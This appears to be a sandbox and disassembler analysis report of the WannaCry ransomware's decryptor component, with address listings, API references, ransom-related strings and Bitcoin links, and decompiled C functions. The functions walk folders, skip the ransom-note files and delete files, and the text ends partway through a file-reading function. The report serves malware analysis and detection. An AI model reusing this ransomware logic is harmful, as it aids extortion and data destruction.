                                                      0x0040713d
                                                      0x0040714d
                                                      0x0040714f
                                                      0x00407156
                                                      0x0040715d
                                                      0x00407163
                                                      0x0040715f
                                                      0x0040715f
                                                      0x0040715f
                                                      0x0040716f
                                                      0x00407171
                                                      0x00407178
                                                      0x0040717f
                                                      0x00407185
                                                      0x00407181
                                                      0x00407181
                                                      0x00407181
                                                      0x00407191
                                                      0x00407193
                                                      0x0040719a
                                                      0x004071a1
                                                      0x004071a7
                                                      0x004071a3
                                                      0x004071a3
                                                      0x004071a3
                                                      0x004071b3
                                                      0x004071b5
                                                      0x004071bc
                                                      0x004071c3
                                                      0x004071c9
                                                      0x004071c5
                                                      0x004071c5
                                                      0x004071c5
                                                      0x004071d5
                                                      0x004071d7
                                                      0x004071de
                                                      0x004071e5
                                                      0x004071e7
                                                      0x004071e7
                                                      0x004071f3
                                                      0x004071f5
                                                      0x004071fc
                                                      0x00407203
                                                      0x00407209
                                                      0x00407205
                                                      0x00407205
                                                      0x00407205
                                                      0x00407215
                                                      0x00407217
                                                      0x0040721e
                                                      0x00407225
                                                      0x0040722b
                                                      0x00407227
                                                      0x00407227
                                                      0x00407227
                                                      0x00407237
                                                      0x00407239
                                                      0x00407240
                                                      0x00407247
                                                      0x0040724d
                                                      0x00407249
                                                      0x00407249
                                                      0x00407249
                                                      0x00407259
                                                      0x0040725b
                                                      0x00407262
                                                      0x00407269
                                                      0x0040726b
                                                      0x0040726b
                                                      0x00407277
                                                      0x00407285
                                                      0x00407288
                                                      0x0040729f
                                                      0x004072b7
                                                      0x004072d0
                                                      0x004072db
                                                      0x004072e8
                                                      0x004072ed
                                                      0x004072f0
                                                      0x004072f9
                                                      0x004072fe
                                                      0x00407304
                                                      0x00407309
                                                      0x0040730c
                                                      0x00407315
                                                      0x00407320
                                                      0x00407329
                                                      0x00407338
                                                      0x00407339
                                                      0x0040733e
                                                      0x0040733f
                                                      0x0040734a
                                                      0x0040734f
                                                      0x00407358
                                                      0x0040735d
                                                      0x00407364
                                                      0x00407372
                                                      0x0040737e
                                                      0x0040737f
                                                      0x00407384
                                                      0x00407385
                                                      0x0040738a
                                                      0x00407393
                                                      0x00407398
                                                      0x004073a3
                                                      0x004073b8
                                                      0x004073ca
                                                      0x004073cc
                                                      0x004073ce
                                                      0x004073d6
                                                      0x004073e6
                                                      0x004073e8
                                                      0x004073ea
                                                      0x004073fc
                                                      0x004073ff
                                                      0x0040740c
                                                      0x00407418
                                                      0x0040741b
                                                      0x00407423
                                                      0x0040742c
                                                      0x00407435
                                                      0x00407442
                                                      0x00407449
                                                      0x00407452
                                                      0x0040745b
                                                      0x00407466
                                                      0x00407472
                                                      0x00407477
                                                      0x00407481
                                                      0x0040748a
                                                      0x00407493
                                                      0x004074a0
                                                      0x004074a7
                                                      0x004074b0
                                                      0x004074b9
                                                      0x004074c4
                                                      0x004074d0
                                                      0x004074da
                                                      0x004074f3
                                                      0x00407503
                                                      0x0040750e
                                                      0x00407520
                                                      0x00407539
                                                      0x00407544
                                                      0x00407549
                                                      0x00407559
                                                      0x00407560
                                                      0x00407561
                                                      0x00407568
                                                      0x0040756d
                                                      0x0040756e
                                                      0x0040757d
                                                      0x00407596
                                                      0x0040759b
                                                      0x004075ad
                                                      0x004075c6
                                                      0x004075c7
                                                      0x004075d6
                                                      0x004075e6
                                                      0x004075ed
                                                      0x004075ee
                                                      0x004075ef
                                                      0x004075f5
                                                      0x004075fa
                                                      0x004075fb
                                                      0x00407600
                                                      0x00407605
                                                      0x00407607
                                                      0x00407610
                                                      0x0040761b
                                                      0x0040762a
                                                      0x00407638

                                                      APIs
                                                        • Part of subcall function 004076A0: time.MSVCRT ref: 004076DA
                                                      • CreateSolidBrush.GDI32(000000E0), ref: 00406FB3
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00406FBC
                                                      • CreateSolidBrush.GDI32(00121284), ref: 00406FC6
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00406FCF
                                                      • CreateSolidBrush.GDI32(0000E000), ref: 00406FD9
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00406FE2
                                                      • CreateSolidBrush.GDI32(00E00000), ref: 00406FEC
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00406FF5
                                                      • CreateSolidBrush.GDI32(00000000), ref: 00406FFC
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00407005
                                                      • CreateSolidBrush.GDI32(003834D1), ref: 0040700F
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00407018
                                                      • CreateSolidBrush.GDI32(00107C10), ref: 00407022
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 0040702B
                                                      • CreateSolidBrush.GDI32(00E8A200), ref: 00407035
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 0040703E
                                                      • CreateSolidBrush.GDI32(00D77800), ref: 00407048
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00407051
                                                      • CreateSolidBrush.GDI32(00003CDA), ref: 0040705B
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00407064
                                                      • CreateFontA.GDI32(00000018,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00407097
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 0040709C
                                                      • CreateFontA.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 004070C9
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 004070CE
                                                      • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 004070FB
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00407104
                                                      • #3092.MFC42(000003ED,00000000,?,767B20C0,?), ref: 00407110
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040712B
                                                      • #3092.MFC42(000003FE,?,767B20C0,?), ref: 00407134
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040714D
                                                      • #3092.MFC42(000003FB,?,767B20C0,?), ref: 00407156
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040716F
                                                      • #3092.MFC42(000003FF,?,767B20C0,?), ref: 00407178
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407191
                                                      • #3092.MFC42(000003FC,?,767B20C0,?), ref: 0040719A
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071B3
                                                      • #3092.MFC42(00000400,?,767B20C0,?), ref: 004071BC
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071D5
                                                      • #3092.MFC42(000003FA,?,767B20C0,?), ref: 004071DE
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071F3
                                                      • #3092.MFC42(00000402,?,767B20C0,?), ref: 004071FC
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407215
                                                      • #3092.MFC42(000003EF,?,767B20C0,?), ref: 0040721E
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407237
                                                      • #3092.MFC42(000003EB,?,767B20C0,?), ref: 00407240
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407259
                                                      • #3092.MFC42(000003EC,?,767B20C0,?), ref: 00407262
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407277
                                                      • #860.MFC42(?,?,767B20C0,?), ref: 00407288
                                                      • #537.MFC42(https://en.wikipedia.org/wiki/Bitcoin,?,?,?,767B20C0,?), ref: 004072F9
                                                      • #537.MFC42(https://www.google.com/search?q=how+to+buy+bitcoin,?,?,?,?,767B20C0,?), ref: 00407315
                                                      • #540.MFC42(?,?,?,?,767B20C0,?), ref: 00407329
                                                      • #2818.MFC42(?,mailto:%s,?,?,?,?,?,767B20C0,?), ref: 0040734A
                                                      • #535.MFC42(?), ref: 0040735D
                                                      • #2818.MFC42(?,http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s,00000000), ref: 00407385
                                                      • #535.MFC42(?), ref: 00407398
                                                        • Part of subcall function 00404210: #858.MFC42(?,?,00413788,000000FF), ref: 00404235
                                                        • Part of subcall function 00404210: #800.MFC42(?,?,00413788,000000FF), ref: 00404246
                                                      • SendMessageA.USER32(?,00000406,00000000,00000064), ref: 004073B8
                                                      • SendMessageA.USER32(?,00000406,00000000,00000064), ref: 004073CA
                                                      • #6140.MFC42(00000002,000000FF), ref: 004073D6
                                                      • #6140.MFC42(00000002,000000FF,00000002,000000FF), ref: 004073FF
                                                        • Part of subcall function 00405860: GetClientRect.USER32(?,?), ref: 0040587E
                                                        • Part of subcall function 00405860: #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 004058A5
                                                        • Part of subcall function 004058C0: GetClientRect.USER32(?,?), ref: 004058DE
                                                        • Part of subcall function 004058C0: #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 00405905
                                                        • Part of subcall function 00405180: _mbscmp.MSVCRT ref: 00405191
                                                        • Part of subcall function 00405180: #860.MFC42(?), ref: 004051A1
                                                        • Part of subcall function 00405180: RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
                                                        • Part of subcall function 00405180: InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
                                                      • GetTimeZoneInformation.KERNEL32(?,0000000B,00000001,0000000B,00000001,00000002,000000FF,00000002,000000FF), ref: 004074DA
                                                        • Part of subcall function 00401E60: VariantTimeToSystemTime.OLEAUT32(?), ref: 00401E7B
                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 00407520
                                                      • #2818.MFC42(?,%d/%d/%d %02d:%02d:%02d,?,?,?,?,?,?), ref: 0040756E
                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 004075AD
                                                      • #2818.MFC42(?,%d/%d/%d %02d:%02d:%02d,?,?,?,?,?,?), ref: 004075FB
                                                      • #6334.MFC42(00000000), ref: 00407607
                                                      • #800.MFC42 ref: 0040761B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #1641CreateMessageSend$#3092$BrushSolid$Time$#2818$FontRectSystem$#535#537#6140#6197#800#860ClientLocalSpecific$#540#6334#858InformationInvalidateRedrawVariantWindowZone_mbscmptime
                                                      • String ID: %d/%d/%d %02d:%02d:%02d$00;00;00;00$Arial$http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s$https://en.wikipedia.org/wiki/Bitcoin$https://www.google.com/search?q=how+to+buy+bitcoin$mailto:%s
                                                      • API String ID: 28786460-3869059234
                                                      • Opcode ID: 566e78bac420e29277e274eb052adce88cec53491b2e7cfac5d24ca603e09d5b
                                                      • Instruction ID: 980e8df72422c457d288d06354c1d21c6ecb0c69e0d4732a7e3947204bb0ebed
                                                      • Opcode Fuzzy Hash: 566e78bac420e29277e274eb052adce88cec53491b2e7cfac5d24ca603e09d5b
                                                      • Instruction Fuzzy Hash: DB02D3B0344705ABD624EB61CC92FBF339AAFC4B04F00452DF2566B2D1DEB8B5058B99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004026B0 Relevance: 54.6, APIs: 26, Strings: 5, Instructions: 318fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 74%
                                                      			E004026B0(void* __ecx) {
				void* _t109;
				intOrPtr* _t110;
				int _t111;
				void* _t115;
				intOrPtr* _t116;
				intOrPtr* _t123;
				intOrPtr _t124;
				char _t125;
				intOrPtr* _t129;
				intOrPtr* _t131;
				intOrPtr* _t135;
				int _t139;
				int _t145;
				int _t146;
				int _t147;
				int _t149;
				int _t154;
				intOrPtr* _t221;
				void _t225;
				intOrPtr* _t226;
				wchar_t* _t227;
				intOrPtr* _t228;
				intOrPtr* _t229;
				void* _t231;
				void* _t232;
				intOrPtr _t234;
				void* _t235;
				void* _t236;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t240;
				void* _t242;

				_push(0xffffffff);
				_push(E0041356E);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t234;
				_t235 = _t234 - 0x56c;
				_t232 = __ecx;
				 *((char*)(_t235 + 0x24)) =  *((intOrPtr*)(_t235 + 3));
				 *((intOrPtr*)(_t235 + 0x20)) = E0040C8F0( *((intOrPtr*)(_t235 + 3)), 0, 0);
				 *((intOrPtr*)(_t235 + 0x24)) = 0;
				 *((char*)(_t235 + 0x10)) =  *((intOrPtr*)(_t235 + 0xb));
				 *(_t235 + 0x584) = 0;
				 *((intOrPtr*)(_t235 + 0x10)) = E0040C8F0(_t105, 0, 0);
				 *((intOrPtr*)(_t235 + 0x14)) = 0;
				 *((char*)(_t235 + 0x588)) = 1;
				swprintf(_t235 + 0x54, L"%s\\*",  *(_t235 + 0x584), _t231);
				_t236 = _t235 + 0xc;
				_t109 = FindFirstFileW(_t236 + 0x54, _t236 + 0x324);
				 *(_t236 + 0x18) = _t109;
				if(_t109 != 0xffffffff) {
					while(1) {
						_t110 =  *((intOrPtr*)(_t232 + 0x4d0));
						if(_t110 != 0 &&  *_t110 != 0) {
							break;
						}
						_t111 = wcscmp(_t236 + 0x358, ".");
						_t236 = _t236 + 8;
						if(_t111 != 0) {
							_t139 = wcscmp(_t236 + 0x358, L"..");
							_t236 = _t236 + 8;
							if(_t139 != 0) {
								_push(_t236 + 0x358);
								swprintf(_t236 + 0x64, L"%s\\%s",  *(_t236 + 0x58c));
								_t236 = _t236 + 0x10;
								if((GetFileAttributesW(_t236 + 0x5c) & 0x00000010) == 0) {
									_t145 = wcscmp(_t236 + 0x358, L"@Please_Read_Me@.txt");
									_t236 = _t236 + 8;
									if(_t145 != 0) {
										_t146 = wcscmp(_t236 + 0x358, L"@WanaDecryptor@.exe.lnk");
										_t236 = _t236 + 8;
										if(_t146 != 0) {
											_t147 = wcscmp(_t236 + 0x358, L"@WanaDecryptor@.bmp");
											_t236 = _t236 + 8;
											if(_t147 != 0) {
												 *((char*)(_t236 + 0x4c)) =  *((intOrPtr*)(_t236 + 0x13));
												__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
												_t149 = wcslen(_t236 + 0x5c);
												_t236 = _t236 + 4;
												__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z(_t236 + 0x5c, _t149);
												 *((char*)(_t236 + 0x590)) = 3;
												E00402DA0(_t236 + 0x48, _t236 + 0x20, _t236 + 0x38,  *(_t236 + 0x18), _t236 + 0x48);
												 *((char*)(_t236 + 0x584)) = 1;
												_push(1);
												goto L14;
											}
										}
									}
								} else {
									if(E00402AF0(_t143, _t236 + 0x5c, _t236 + 0x358) == 0) {
										 *((char*)(_t236 + 0x3c)) =  *((intOrPtr*)(_t236 + 0x13));
										__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
										_t154 = wcslen(_t236 + 0x5c);
										_t236 = _t236 + 4;
										__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z(_t236 + 0x5c, _t154);
										 *((char*)(_t236 + 0x590)) = 2;
										E00402DA0(_t236 + 0x38, _t236 + 0x30, _t236 + 0x34,  *((intOrPtr*)(_t236 + 0x28)), _t236 + 0x38);
										 *((char*)(_t236 + 0x584)) = 1;
										_push(1);
										L14:
										__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z();
									}
								}
							}
						}
						if(FindNextFileW( *(_t236 + 0x20), _t236 + 0x32c) != 0) {
							continue;
						}
						break;
					}
					FindClose( *(_t236 + 0x20));
					_t115 =  *(_t236 + 0x18);
					_t225 =  *_t115;
					if(_t225 != _t115) {
						while(1) {
							_t135 =  *((intOrPtr*)(_t232 + 0x4d0));
							if(_t135 != 0 &&  *_t135 != 0) {
								goto L22;
							}
							_t136 =  *((intOrPtr*)(_t225 + 0xc));
							if( *((intOrPtr*)(_t225 + 0xc)) == 0) {
								_t136 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
							}
							E00402560(_t232, _t136);
							_t225 =  *_t225;
							if(_t225 !=  *(_t236 + 0x18)) {
								continue;
							}
							goto L22;
						}
					}
					L22:
					_t116 =  *((intOrPtr*)(_t236 + 0x28));
					_t226 =  *_t116;
					if(_t226 != _t116) {
						while(1) {
							_t131 =  *((intOrPtr*)(_t232 + 0x4d0));
							if(_t131 != 0 &&  *_t131 != 0) {
								goto L28;
							}
							_t132 =  *((intOrPtr*)(_t226 + 0xc));
							if( *((intOrPtr*)(_t226 + 0xc)) == 0) {
								_t132 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
							}
							E004026B0(_t232, _t132);
							_t226 =  *_t226;
							if(_t226 !=  *((intOrPtr*)(_t236 + 0x28))) {
								continue;
							}
							goto L28;
						}
					}
					L28:
					_t227 =  *(_t236 + 0x58c);
					swprintf(_t236 + 0x64, L"%s\\%s", _t227);
					_t237 = _t236 + 0x10;
					DeleteFileW(_t237 + 0x5c);
					swprintf(_t237 + 0x64, L"%s\\%s", _t227, L"@WanaDecryptor@.exe.lnk", L"@Please_Read_Me@.txt");
					_t238 = _t237 + 0x10;
					DeleteFileW(_t238 + 0x5c);
					_t123 =  *((intOrPtr*)(_t238 + 0x18));
					 *((char*)(_t238 + 0x584)) = 0;
					_t221 = _t123;
					_t228 =  *_t123;
					if(_t228 != _t123) {
						do {
							_t129 = _t228;
							_t228 =  *_t228;
							E00402E90(_t238 + 0x1c, _t238 + 0x34, _t129);
						} while (_t228 != _t221);
						_t123 =  *((intOrPtr*)(_t238 + 0x18));
					}
					_push(_t123);
					L00412C98();
					_t229 =  *((intOrPtr*)(_t238 + 0x2c));
					 *((intOrPtr*)(_t238 + 0x1c)) = 0;
					 *((intOrPtr*)(_t238 + 0x20)) = 0;
					_t239 = _t238 + 4;
					_t124 =  *_t229;
					 *((intOrPtr*)(_t239 + 0x584)) = 0xffffffff;
					 *((intOrPtr*)(_t239 + 0x20)) = _t124;
					if(_t124 != _t229) {
						do {
							_push(0);
							E00402E90(_t239 + 0x2c, _t239 + 0x58,  *((intOrPtr*)(E00402D90(_t239 + 0x28, _t239 + 0x34))));
						} while ( *((intOrPtr*)(_t239 + 0x20)) != _t229);
					}
					_push( *((intOrPtr*)(_t239 + 0x28)));
					L00412C98();
					_t240 = _t239 + 4;
					_t125 = 1;
				} else {
					 *((char*)(_t236 + 0x57c)) = 0;
					E00402E00(_t236 + 0x18, _t236 + 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x10)))),  *((intOrPtr*)(_t236 + 0x10)));
					_push( *((intOrPtr*)(_t236 + 0x10)));
					L00412C98();
					_t242 = _t236 + 4;
					 *((intOrPtr*)(_t242 + 0x10)) = 0;
					 *((intOrPtr*)(_t242 + 0x14)) = 0;
					 *((intOrPtr*)(_t242 + 0x588)) = 0xffffffff;
					E00402E00(_t242 + 0x28, _t242 + 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x24)))),  *((intOrPtr*)(_t236 + 0x24)));
					_push( *((intOrPtr*)(_t242 + 0x20)));
					L00412C98();
					_t240 = _t242 + 4;
					_t125 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t240 + 0x574));
				return _t125;
			}




































                                                      0x004026b0
                                                      0x004026b2
                                                      0x004026bd
                                                      0x004026be
                                                      0x004026c5
                                                      0x004026d3
                                                      0x004026db
                                                      0x004026e4
                                                      0x004026e8
                                                      0x004026f1
                                                      0x004026fa
                                                      0x00402706
                                                      0x0040270a
                                                      0x00402720
                                                      0x00402728
                                                      0x0040272e
                                                      0x0040273e
                                                      0x00402747
                                                      0x0040274b
                                                      0x004027c2
                                                      0x004027c2
                                                      0x004027ca
                                                      0x00000000
                                                      0x00000000
                                                      0x004027e1
                                                      0x004027e3
                                                      0x004027e8
                                                      0x004027fb
                                                      0x004027fd
                                                      0x00402802
                                                      0x00402816
                                                      0x00402822
                                                      0x00402828
                                                      0x00402838
                                                      0x004028c3
                                                      0x004028c5
                                                      0x004028ca
                                                      0x004028dd
                                                      0x004028df
                                                      0x004028e4
                                                      0x004028f3
                                                      0x004028f5
                                                      0x004028fa
                                                      0x00402905
                                                      0x00402909
                                                      0x00402914
                                                      0x00402916
                                                      0x00402923
                                                      0x0040293c
                                                      0x00402944
                                                      0x00402949
                                                      0x00402951
                                                      0x00000000
                                                      0x00402953
                                                      0x004028fa
                                                      0x004028e4
                                                      0x0040283a
                                                      0x00402850
                                                      0x0040285f
                                                      0x00402863
                                                      0x0040286e
                                                      0x00402870
                                                      0x0040287d
                                                      0x00402896
                                                      0x0040289e
                                                      0x004028a3
                                                      0x004028ab
                                                      0x00402957
                                                      0x00402957
                                                      0x00402957
                                                      0x00402850
                                                      0x00402838
                                                      0x00402802
                                                      0x00402972
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00402972
                                                      0x0040297d
                                                      0x00402983
                                                      0x00402987
                                                      0x0040298b
                                                      0x0040298d
                                                      0x0040298d
                                                      0x00402995
                                                      0x00000000
                                                      0x00000000
                                                      0x0040299b
                                                      0x004029a0
                                                      0x004029a2
                                                      0x004029a2
                                                      0x004029aa
                                                      0x004029af
                                                      0x004029b7
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004029b7
                                                      0x0040298d
                                                      0x004029b9
                                                      0x004029b9
                                                      0x004029bd
                                                      0x004029c1
                                                      0x004029c3
                                                      0x004029c3
                                                      0x004029cb
                                                      0x00000000
                                                      0x00000000
                                                      0x004029d1
                                                      0x004029d6
                                                      0x004029d8
                                                      0x004029d8
                                                      0x004029e0
                                                      0x004029e5
                                                      0x004029ed
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004029ed
                                                      0x004029c3
                                                      0x004029ef
                                                      0x004029ef
                                                      0x00402a0c
                                                      0x00402a0e
                                                      0x00402a16
                                                      0x00402a2c
                                                      0x00402a2e
                                                      0x00402a36
                                                      0x00402a3c
                                                      0x00402a40
                                                      0x00402a47
                                                      0x00402a49
                                                      0x00402a4d
                                                      0x00402a4f
                                                      0x00402a4f
                                                      0x00402a51
                                                      0x00402a5d
                                                      0x00402a62
                                                      0x00402a66
                                                      0x00402a66
                                                      0x00402a6a
                                                      0x00402a6b
                                                      0x00402a70
                                                      0x00402a74
                                                      0x00402a78
                                                      0x00402a7c
                                                      0x00402a7f
                                                      0x00402a81
                                                      0x00402a8e
                                                      0x00402a92
                                                      0x00402a94
                                                      0x00402a98
                                                      0x00402aaf
                                                      0x00402ab4
                                                      0x00402a94
                                                      0x00402abe
                                                      0x00402abf
                                                      0x00402ac4
                                                      0x00402ac7
                                                      0x0040274d
                                                      0x00402751
                                                      0x00402765
                                                      0x0040276e
                                                      0x0040276f
                                                      0x00402778
                                                      0x0040277b
                                                      0x0040277f
                                                      0x00402790
                                                      0x0040279b
                                                      0x004027a4
                                                      0x004027a5
                                                      0x004027aa
                                                      0x004027ad
                                                      0x004027ad
                                                      0x00402ad7
                                                      0x00402ae4

                                                      APIs
                                                        • Part of subcall function 0040C8F0: #823.MFC42(00000018,0040BB62,00000000,00000000), ref: 0040C8F2
                                                      • swprintf.MSVCRT ref: 00402728
                                                      • FindFirstFileW.KERNEL32(?,?,00000000), ref: 0040273E
                                                      • #825.MFC42(?,?,?,?), ref: 0040276F
                                                        • Part of subcall function 00402E00: #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
                                                      • #825.MFC42(?), ref: 004027A5
                                                      • wcscmp.MSVCRT ref: 004027E1
                                                      • wcscmp.MSVCRT ref: 004027FB
                                                      • swprintf.MSVCRT(?,%s\%s,?,?), ref: 00402822
                                                      • GetFileAttributesW.KERNEL32(?), ref: 00402830
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?), ref: 00402863
                                                      • wcslen.MSVCRT ref: 0040286E
                                                      • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 0040287D
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00402957
                                                      • FindNextFileW.KERNEL32(?,?), ref: 0040296A
                                                      • FindClose.KERNEL32(?), ref: 0040297D
                                                        • Part of subcall function 00402E00: #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #825$FileFindG@2@@std@@G@std@@U?$char_traits@V?$allocator@$Tidy@?$basic_string@swprintfwcscmp$#823?assign@?$basic_string@AttributesCloseFirstNextV12@wcslen
                                                      • String ID: %s\%s$%s\*$@Please_Read_Me@.txt$@WanaDecryptor@.bmp$@WanaDecryptor@.exe.lnk
                                                      • API String ID: 1037557366-268640142
                                                      • Opcode ID: e79b0c1c647add8853af76cbf20fb173565abedc36f5e4bac0d8a38ddea0bf7b
                                                      • Instruction ID: 208863b35b678a93ee2eb357de9df0ae1c195017ff787e099a5ee1d1e2129eec
                                                      • Opcode Fuzzy Hash: e79b0c1c647add8853af76cbf20fb173565abedc36f5e4bac0d8a38ddea0bf7b
                                                      • Instruction Fuzzy Hash: 48C163B16083419FC720DF64CD84AEBB7E8ABD8304F44492EF595A3291E778E944CF66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004020A0 Relevance: 45.9, APIs: 25, Strings: 1, Instructions: 359filetimeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 73%
                                                      			E004020A0(intOrPtr __ecx, WCHAR* _a4, WCHAR* _a8) {
				struct _OVERLAPPED* _v8;
				char _v20;
				long _v32;
				long _v36;
				union _LARGE_INTEGER* _v40;
				void _v44;
				char _v48;
				char _v560;
				struct _OVERLAPPED* _v564;
				union _LARGE_INTEGER* _v568;
				void _v572;
				char _v573;
				short _v575;
				intOrPtr _v579;
				void _v580;
				struct _FILETIME _v588;
				struct _FILETIME _v596;
				struct _FILETIME _v604;
				void* _v608;
				void _v612;
				void _v616;
				void* _v620;
				intOrPtr _v624;
				void* __ebx;
				void* __ebp;
				int _t109;
				int _t113;
				int _t115;
				int _t116;
				int _t118;
				void* _t119;
				signed int _t122;
				signed int _t137;
				signed int _t139;
				int _t140;
				signed int _t141;
				int _t145;
				signed int _t148;
				int _t152;
				int _t155;
				void* _t159;
				intOrPtr _t196;
				signed int _t212;
				signed int _t213;
				void* _t216;
				intOrPtr _t223;
				signed int _t224;
				void* _t226;
				intOrPtr _t227;

				_push(0xffffffff);
				_push(0x4158c8);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t227;
				_push(_t212);
				_v624 = __ecx;
				_t213 = _t212 | 0xffffffff;
				_v620 = _t213;
				_v608 = _t213;
				_v48 = 0;
				_v616 = 0;
				_v580 = 0;
				_v579 = 0;
				_v575 = 0;
				_v573 = 0;
				_v612 = 0;
				_v36 = 0;
				_v32 = 0;
				_v564 = 0;
				_v8 = 0;
				_t159 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0, 0);
				_v620 = _t159;
				if(_t159 != _t213) {
					GetFileTime(_t159,  &_v604,  &_v596,  &_v588);
					_t109 = ReadFile(_t159,  &_v580, 8,  &_v36, 0);
					__eflags = _t109;
					if(_t109 == 0) {
						L32:
						_push(0xffffffff);
						_push( &_v20);
						goto L33;
					} else {
						__eflags = 0;
						asm("repe cmpsd");
						if(0 != 0) {
							goto L32;
						} else {
							_t113 = ReadFile(_t159,  &_v616, 4,  &_v36, 0);
							__eflags = _t113;
							if(_t113 == 0) {
								goto L32;
							} else {
								__eflags = _v616 - 0x100;
								if(_v616 != 0x100) {
